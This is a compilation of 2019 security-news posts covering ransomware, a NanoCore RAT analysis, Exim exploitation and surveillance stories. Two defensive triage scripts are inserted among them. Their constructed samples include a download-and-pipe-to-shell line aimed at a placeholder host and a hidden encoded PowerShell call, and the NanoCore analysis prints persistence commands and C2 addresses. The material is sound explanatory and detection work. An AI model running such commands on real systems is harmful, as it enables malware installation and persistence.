  • Advanced users are offered a dedicated Tor exit node and hidden (onion) services at their data center
  • Their servers run on 100% green energy

How you can increase your online security and privacy even more

Hopefully, I’ve helped you choose an encrypted email alternative to the provider you are currently using. Yet, obviously, email privacy does not equal online security.

Even though some of the email services listed above also include spam filtering, virus scanning, or report phishing options, malicious attackers can always find ways to send you malware-infected links via email.  

This is why you should also be using a proactive, threat prevention solution for your PC, which lets you click any link with confidence and allows you to be sure that you won’t get touched by malware.  

And it scans and blocks the URLs you click both in your inbox and anywhere else on the web.   


Here’s some great news for companies  

We’re working hard on a brand new email module specifically designed to prevent business email compromise (BEC) attacks. We will keep you posted on the progress, so stay tuned!

Are you using any secure email service? Do you have any suggestions that we could add to the list? Let us know in the comments section below!


The post The Best Encrypted Email Services You Need to Use in 2019 appeared first on Heimdal Security Blog.

This Week in Security News: Spam Campaigns and Cryptocurrency Miners

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about advanced targeted attack tools being used to distribute cryptocurrency miners as well as a spam campaign targeting European users.

Read on:

Advanced Targeted Attack Tools Found Being Used to Distribute Cryptocurrency Miners
Regular cybercriminals appear to be taking a page from targeted attack actors’ playbooks — or rather, toolkits — to maximize their profits from illicit activities like cryptojacking.

Congress to Take Another Stab at ‘Hack Back’ Legislation
Rep. Tom Graves, R-Ga., is reintroducing a bill that would allow companies to go outside of their own networks to identify their attackers and possibly disrupt their activities.

Spam Campaign Targets European Users with Microsoft Office Vulnerability (CVE-2017-11882)
An active Microsoft Office and WordPad spam campaign is targeting European users, using languages such as Romanian and files that allow attackers to exploit the CVE-2017-11882 vulnerability.

License Plates, Photos, Passwords and More Stolen in Two Separate Breaches
Two major breaches, one at US Customs and Border Protection and another with a retro gaming site Emuparadise, highlight the need for effective data protection.

Major HSM Vulnerabilities Impact Banks, Cloud Providers, Governments
Two security researchers have recently revealed vulnerabilities that can be exploited remotely to retrieve sensitive data stored inside special computer components known as HSMs (Hardware Security Modules).

Data Breach Disclosed by Online Invitation Firm Evite
Online invitation and stationery company Evite notified customers of a data breach that stemmed from an inactive data storage file associated with user accounts.

June’s Patch Tuesday Fixes 88 Security Flaws, Including SandboxEscaper’s Zero Days, HoloLens
Microsoft’s June Patch Tuesday announced the release of 88 vulnerability patches in this month’s security bulletin, as well as four advisories and one servicing stack update.

Have I Been Pwned Is Looking for a New Owner
Owner Troy Hunt revealed he’s looking for an acquirer for the breach notification service he set up called “Have I Been Pwned”. Traffic to the site has exploded since January when he uploaded a 773 million record list of breached emails and passwords that could be used for automated unauthorized logins.

Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns
In their latest campaign, cybercriminal group TA505 used HTML attachments to deliver malicious .XLS files that lead to downloader and backdoor FlawedAmmyy, mostly to target users in South Korea.

MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools
Analysis of new campaigns wearing the badge of MuddyWater revealed the use of new tools and payloads, which indicates that the well-known threat actor group is continuously developing their schemes.

U.S. Ramping Up Offensive Cyber Measures to Stop Economic Attacks, Bolton Says
The U.S. is beginning to use offensive cyber measures in response to commercial espionage, according to John Bolton, President Trump’s national security adviser.

CVE-2019-2725 Exploited and Certificate Files Used for Obfuscation to Deliver Monero Miner
Feedback from the Trend Micro Smart Protection Network security architecture revealed a cryptocurrency-mining activity involving the CVE-2019-2725 vulnerability, but with an interesting twist — the malware hides its malicious codes in certificate files as an obfuscation tactic.
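Hiding a payload inside a "certificate" works because many tools only look at the PEM header and footer. A structural check closes that gap: the base64 body of a real certificate decodes to exactly one DER SEQUENCE containing a SEQUENCE (tbsCertificate), a SEQUENCE (signatureAlgorithm) and a BIT STRING (signatureValue), with nothing after it. The following is an added example, not Trend Micro code and not a reproduction of the miner described above; its three PEM samples are constructed here (one has only the outer shape of a certificate, not a real signed one).

```python
"""Is this 'certificate' really a certificate?  A structural PEM check.

Added example for the CVE-2019-2725 miner item above; it is not Trend Micro
code and does not reproduce that malware. The three samples are constructed:
a DER object with the outer shape of an X.509 certificate (dummy contents,
not a real cert), a PEM wrapper around a non-DER blob, and a well-formed
object with extra bytes appended after it.
"""
import base64
import binascii
import re

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)
SEQUENCE, BIT_STRING = 0x30, 0x03

# --- minimal DER helpers (enough for the outer layers of a certificate) -----

def der_length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_length(len(content)) + content

def read_tlv(buf: bytes, pos: int):
    """Parse one tag-length-value at pos; return (tag, content, end).
    Raises ValueError when the bytes do not form a sane DER element."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or pos + nbytes > len(buf):
            raise ValueError("indefinite or oversized length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    end = pos + length
    if end > len(buf):
        raise ValueError("length exceeds buffer")
    return tag, buf[pos:end], end

def to_pem(label: str, raw: bytes) -> str:
    b64 = base64.b64encode(raw).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"

# --- the check ---------------------------------------------------------------

def analyse_pem(text: str) -> list:
    """Return a list of findings; [] means the body is one DER
    SEQUENCE { SEQUENCE, SEQUENCE, BIT STRING } with nothing after it."""
    m = PEM_RE.search(text)
    if not m:
        return ["no PEM block found"]
    label, body = m.group(1), re.sub(r"\s+", "", m.group(2))
    findings = []
    if label != "CERTIFICATE":
        findings.append(f"label is {label!r}, not CERTIFICATE")
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error:
        return findings + ["body is not valid base64"]
    try:
        tag, content, end = read_tlv(raw, 0)
    except ValueError as exc:
        return findings + [f"body is not a DER object ({exc})"]
    if tag != SEQUENCE:
        findings.append(f"outer tag 0x{tag:02x} is not SEQUENCE")
    if end != len(raw):
        findings.append(f"{len(raw) - end} trailing bytes after the DER object")
    children, pos = [], 0
    try:
        while pos < len(content):
            child_tag, _, pos = read_tlv(content, pos)
            children.append(child_tag)
    except ValueError:
        findings.append("inner structure malformed")
    if children != [SEQUENCE, SEQUENCE, BIT_STRING]:
        findings.append("top-level children do not match Certificate ::= SEQUENCE { tbs, sigAlg, sig }")
    return findings

# --- constructed samples -----------------------------------------------------

# Outer shape of a certificate with dummy inner values; not a real cert.
CERT_SHAPED_DER = der(SEQUENCE,
    der(SEQUENCE, b"\x02\x01\x01")              # tbsCertificate (stub: INTEGER 1)
    + der(SEQUENCE, b"\x06\x03\x55\x04\x03")    # signatureAlgorithm (stub OID)
    + der(BIT_STRING, b"\x00\xab\xcd"))         # signatureValue (stub)
SAMPLE_CERT_SHAPE_PEM = to_pem("CERTIFICATE", CERT_SHAPED_DER)

# A non-certificate blob wearing a certificate header: constructed stand-in
# for an executable or script dropped as "cert.pem".
SAMPLE_SMUGGLED_PEM = to_pem("CERTIFICATE", b"MZ" + b"\x90" * 94 + b"powershell -nop -w hidden -enc AAAA")

# A well-formed object followed by extra bytes; parsers that stop at the
# DER length silently ignore the tail.
SAMPLE_APPENDED_PEM = to_pem("CERTIFICATE", CERT_SHAPED_DER + b"\n#!/bin/sh\nwget -qO- http://example.invalid/m | sh\n")

if __name__ == "__main__":
    for name, pem in (("cert-shaped", SAMPLE_CERT_SHAPE_PEM),
                      ("smuggled", SAMPLE_SMUGGLED_PEM),
                      ("appended", SAMPLE_APPENDED_PEM)):
        print(name, analyse_pem(pem) or "OK")
```

This is a triage filter, not a certificate validator: a file that passes still needs a real X.509 parser before anything trusts it, but a file that fails has no business being named *.pem or *.crt and deserves a look at what its base64 actually decodes to.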

Do you worry about being targeted by spam campaigns via work tools like Microsoft Office? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.



The post This Week in Security News: Spam Campaigns and Cryptocurrency Miners appeared first on .

Episode 515 – Security In Five Patreon Site Is Live

After two years, Security In Five is ready to expand into new content and media to help spread the security awareness word. A Patreon site has been launched to help support this expansion. This episode talks about why it was created and goes through the different levels. Security In Five Patreon. Be aware, […]

The post Episode 515 – Security In Five Patreon Site Is Live appeared first on Security In Five.

French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the pyLocky ransomware versions 1 and 2: French authorities have released a pyLocky decryptor that recovers the files for free.

French authorities have released a decryptor for pyLocky ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology and Systems Service, and independent volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is the result of a collaboration among the agencies of the French Ministry of the Interior, including the first Brigade of fraud investigations in information technology (BEFTI) of the Regional Directorate of the Judicial Police of Paris, on the basis of technical elements gathered during its investigations and collaboration with volunteer researchers,” reads the post published by the French Ministry of the Interior.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST(SI)², part of the National Gendarmerie, to create that software.”

French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses, associations.

The pyLocky decryptor can decrypt files encrypted by version 1 (filenames with the .lockedfile or .lockymap extensions) and by version 2 (.locky extension).

pyLocky Decryptor

The pyLocky Decryptor could be downloaded from the following link:

The decryptor requires the Java Runtime Environment to be installed.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of two hardcoded private RSA keys, which were likely obtained by the French police through access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)

The post French authorities released the PyLocky decryptor for versions 1 and 2 appeared first on Security Affairs.

Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of Nanocore Remote Administrator Tools (RAT) using a Delphi wrapper to protect its code.


Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware whose client builders are available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the luxury sector. For instance, we intercepted a malicious email claiming to come from a well-known Italian bank, and we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with an Adobe Acrobat icon, a trivial trick used to lure unwary users into believing it is a legitimate PDF file. In fact it contains a PE executable:

Threat: Nanocore RAT wrapper
Brief Description: Delphi Language Wrapper for Nanocore RAT

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with the “BobSoft Mini Delphi” compiler, and two characteristics are significant: the first is the high level of entropy, which leads us to think the sample is somehow packed; the second is the clearly fake compilation timestamp of the executable.

Executing the malware, we noticed some checks performed by the malware in order to evade analysis environments.

Figure 3: Processes checked by malware

The figure above shows some of the processes checked by the malware. This check is performed using the classic Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If none of the checked processes is running, the malware proceeds with the real infection: it writes the actual Nanocore RAT payload into the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

Interestingly, the payload that is later loaded into memory is simply embedded in a resource, without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the figure above, the “trasferimento.exe” Delphi wrapper has many embedded resources (visible on the left), and one of them contains the entire Nanocore RAT payload. On the right is a diff between the resource named “2035” and the actual payload dropped on the victim machine. Resource “2035” has a sort of header (highlighted in yellow in the upper-left corner) containing the name of the payload to implant on the machine, “non.exe”. The code that follows is identical and has no protection at all. The “trasferimento.exe” component then creates a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates an XML file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawns itself through the following command lines:

"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp"
"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp"

The body of the xml configuration file is the following:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>

The only difference between the two scheduled tasks is that one references the “trasferimento.exe” process and the other references the “non.exe” process. It seems to be a sort of survival mechanism in which both processes run and keep the infection alive.
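A quick way to triage a task definition like the one above is to parse the XML and flag the traits it exhibits: an elevated run level, no triggers, no execution time limit, and an action that lives in a user-writable folder. The following script is an added example and not part of the Cybaze-Yoroi analysis; the two task definitions it embeds are constructed, and they carry the standard Task Scheduler namespace that the dump above has stripped.

```python
"""Triage a Windows Task Scheduler XML definition for persistence red flags.

Added example, not part of the original analysis.  The checks mirror the
traits of the "IMAP Subsystem" task registered with "schtasks /create /xml".
"""
import re
import xml.etree.ElementTree as ET

# Directories a normal user can write to.  A task whose action lives here is a
# common persistence pattern (the sample ran from Desktop and %TEMP%).
USER_WRITABLE_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\desktop\\",
    "\\downloads\\",
    "\\users\\public\\",
    "\\windows\\temp\\",
)


def _localname(tag):
    """Drop the namespace from '{ns}Tag' so real exports and stripped dumps parse alike."""
    return tag.rsplit("}", 1)[-1]


def _first_text(root, name, default=""):
    """Text of the first element called `name` (namespace-agnostic), or `default`."""
    for elem in root.iter():
        if _localname(elem.tag) == name:
            return (elem.text or "").strip()
    return default


def _has_children(root, name):
    for elem in root.iter():
        if _localname(elem.tag) == name:
            return len(elem) > 0
    return False


def triage_task_xml(xml_text):
    """Return {'command': str, 'findings': [str]} for one task definition."""
    # Drop the <?xml ... encoding="UTF-16"?> declaration: the text is already a str.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(body)
    command = _first_text(root, "Command").strip('"')
    findings = []
    if _first_text(root, "RunLevel") == "HighestAvailable":
        findings.append("RunLevel=HighestAvailable: runs elevated for an admin user")
    if _first_text(root, "Hidden").lower() == "true":
        findings.append("Hidden=true: task hidden from the Task Scheduler UI")
    if _first_text(root, "ExecutionTimeLimit") == "PT0S":
        findings.append("ExecutionTimeLimit=PT0S: the action may run indefinitely")
    if not _has_children(root, "Triggers"):
        findings.append("no triggers: the task is only ever started on demand")
    if any(d in command.lower() for d in USER_WRITABLE_DIRS):
        findings.append("action lives in a user-writable directory: " + command)
    return {"command": command, "findings": findings}


# Constructed sample mirroring the task the wrapper registers (standard namespace added).
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Hidden>false</Hidden>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task: time-triggered, least privilege, vendor path, bounded run time.
BENIGN_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2019-06-01T03:00:00</StartBoundary></CalendarTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden><ExecutionTimeLimit>PT1H</ExecutionTimeLimit></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml in (("sample", SAMPLE_TASK_XML), ("benign", BENIGN_TASK_XML)):
        report = triage_task_xml(xml)
        print(label, report["command"])
        for finding in report["findings"]:
            print("  -", finding)
```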

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31[.]50) was down and the other (79.134.225[.]41) was still active.

Figure 9: Communication with two different C2

NanoCore Client

Threat: Nanocore RAT
Brief Description: NanoCore RAT client

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start analyzing the “non.exe” file, which is the Nanocore RAT client; this one is compiled in .NET.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after a few steps of debugging; we also extracted the current version, as highlighted in the red square. Continuing with debugging, we found a recurrent routine used to decrypt the RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, this one relies on an encrypted configuration that is only decrypted at run time. Interestingly, the extracted configuration does not include persistence, which is instead guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the figure above, this client has some interesting features enabled, such as the capability to bypass UAC or to prevent the system from going to sleep. Moreover, the primary and backup C2 are the same, and a fallback C2 is instead guaranteed through the other “trasferimento.exe” process running in RAT mode.


Nowadays many cyber criminals don’t bother to write malware from scratch, because a vast number of public tools already suit this need. From the attacker’s point of view, the problem with these tools is that sooner or later they will be recognized by anti-virus engines.

Therefore, attackers adopt other technologies such as packers and obfuscators, many of them publicly available too, or write custom loaders to hide their espionage tools, keeping them running on victim machines for a long time, silently observing their targets and awaiting the right moment to act on their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)

The post Dissecting NanoCore Crimeware Attack Chain appeared first on Security Affairs.

Aviation Equipment Major ASCO Victim of Ransomware Attack

The Belgian manufacturer of aeronautical equipment ASCO was forced to close its operations in Belgium, Germany, Canada and the United States after a ransomware attack at its Zaventem plant in Belgium.

ASCO is one of the world’s largest manufacturers of aeronautical equipment and provides high-end components, such as lifting devices, mechanical assemblies and functional parts, to aviation giants including Boeing, Airbus, Lockheed Martin, Bombardier Aerospace and Embraer.

The computer systems at the Zaventem plant in Belgium, which also serves as headquarters, were attacked last Friday by a ransomware attack, forcing the company to close its factories in Belgium, Germany, Canada and the United States to mitigate the impact of the attack.

ASCO employees sent on leave for an indefinite period

ASCO, acquired last year by the American company Spirit AeroSystems, also sent home about 1,000 of the 1,400 employees at these factories for an extended period and asked them not to return to work until further notice. However, the company’s non-production offices in France and Brazil are currently operational.

ASCO has not yet issued any official statement regarding the ransomware attack, nor has it communicated the details of the ransom demand, whether the company intends to respond to it, or whether the infection has caused the loss of intellectual property. However, the company told the Brussels Times that it had not yet detected any theft or loss of information.

Andrea Carcano, CPO and co-founder of Nozomi Networks, warned that it is never advisable to pay the ransom in these situations. “There is no guarantee that criminals will restore the systems. Organizations must prepare for this type of event and have a plan to limit the damage and the reputation of the brand.”

The attack comes two months after the European Commission approved the acquisition of the company by Spirit AeroSystems, based in the United States. The all-cash acquisition of SRIF, the parent company of the Belgian-based aircraft components manufacturer, for a total of $650 million (£512 million) was announced in May 2018.

The first EU regulatory review was stopped in October 2018 when Spirit withdrew its first contract notice to the Commission due to regulatory concerns. The company resumed the regulatory process in February 2019 after informing the European Commission on 30th January.

There was no press release or announcement from either company. The LinkedIn and Twitter accounts of both companies had not provided any confirmation or acknowledgment of the attack at the time the report was released.

The aeronautics industry has been a target of hackers recently. When an airline is purchased, the new owner is more likely to keep the legacy systems instead of integrating and fully updating them. Newer airlines are better equipped and have control over their IT systems.

In terms of ransomware, prevention is better than cure. Keep all systems up to date with the latest patches and make sure there are no unaddressed security vulnerabilities that could leave the organization exposed to attackers.

Also, Read:

Ransomware Attack Impacts Baltimore Emails, Online Payments

FBI Investigating Baltimore Ransomware Attack



Linux servers under attack via latest Exim flaw

It didn’t take long for attackers to start exploiting the recently revealed Exim vulnerability (CVE-2019-10149).

Active campaigns

One security enthusiast detected exploitation attempts five days ago:

“Just detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149). Tries to download a script located at (careful). If you run Exim, make sure it's up-to-date. @qualys” — Freddie Leeman (@freddieleeman) June 9, 2019

Amit Serper, Cybereason’s head of security research, … More

The post Linux servers under attack via latest Exim flaw appeared first on Help Net Security.

French Ministry of Interior Releases Decryptor for PyLocky Versions 1 & 2

The French Ministry of Interior has released a decryption utility for versions 1 and 2 of PyLocky ransomware to the public. On 11 June, the ministry of the French government unveiled the tool as the product of collaboration between its various agencies, including the Brigade d’enquêtes sur les fraudes aux technologies de l’information (BEFTI) of […]… Read More

The post French Ministry of Interior Releases Decryptor for PyLocky Versions 1 & 2 appeared first on The State of Security.

Video Surveillance by Computer

The ACLU's Jay Stanley has just published a fantastic report: "The Dawn of Robot Surveillance" (blog post here) Basically, it lays out a future of ubiquitous video cameras watched by increasingly sophisticated video analytics software, and discusses the potential harms to society.

I'm not going to excerpt a piece, because you really need to read the whole thing.

Home Secretary Signs Assange US Extradition Request


The UK home secretary Sajid Javid has approved a request from the US for the extradition of WikiLeaks founder Julian Assange.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count indictment detailing charges related to Assange’s publishing of that classified information, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Vulnerabilities allow attackers to take over infusion pumps

Two vulnerabilities in Windows CE-powered Alaris Gateway Workstations (AWGs), which provide support for widely used infusion pumps, could allow remote attackers to disable the device, install malware, report false information, and even instruct the pumps to alter drug dosages and infusion rates. About Alaris Gateway Workstations Developed by US-based medical device maker Becton, Dickinson and Company (BD), Alaris Gateway Workstations are deployed in healthcare establishments in Europe and Asia. A company spokesperson told TechCrunch that … More

The post Vulnerabilities allow attackers to take over infusion pumps appeared first on Help Net Security.

Millions of Email Servers at Risk from Cryptomining Worm


Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appear to be two waves of attack: in the first, attackers initially pushed out exploits from a command and control (C2) server on the clear web. The second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

Yubico is replacing for free YubiKey FIPS devices due to security weakness

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes cryptographic operations easier to crack under specific conditions.

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes it easier to crack RSA keys and ECDSA signatures generated on these devices.

The security advisory published by the company states that the issue affects YubiKey FIPS Series devices running firmware versions 4.4.2 and 4.4.4. The weakness affects the PIV smart card application, Universal 2nd Factor (U2F) authentication, OATH one-time passwords, and OpenPGP. YubiKey Nano FIPS, C FIPS and C Nano FIPS devices are also affected.

“An issue exists in the YubiKey FIPS Series devices with firmware version 4.4.2 or 4.4.4 (there is no released firmware version 4.4.3) where random values leveraged in some YubiKey FIPS applications contain reduced randomness for the first operations performed after YubiKey FIPS power-up,” reads the advisory published by Yubico.

“The issue only affects certain use cases and scenarios. YubiKey FIPS applications utilizing ECDSA are at higher risk than other use cases.”

Some YubiKey FIPS applications rely on random values that contain reduced randomness for the first operations performed after the device powers up.

“The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted,” continues the advisory.

Yubico discovered the flaw in March and addressed it with the release of the firmware version 4.4.5 that was certified at the end of April.

At the time of writing, there are no reports of attacks exploiting the issue in the wild.

Yubico is contacting its customers to inform them of the free device replacement. The company said that most of the affected security keys have already been replaced or are in the process of being replaced.

People who bought their devices from a reseller should contact the reseller and ask for a device replacement.

Pierluigi Paganini

(SecurityAffairs – Yubico, hacking)

The post Yubico is replacing for free YubiKey FIPS devices due to security weakness appeared first on Security Affairs.

MI5 Breached Surveillance Law for Years


MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose',” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

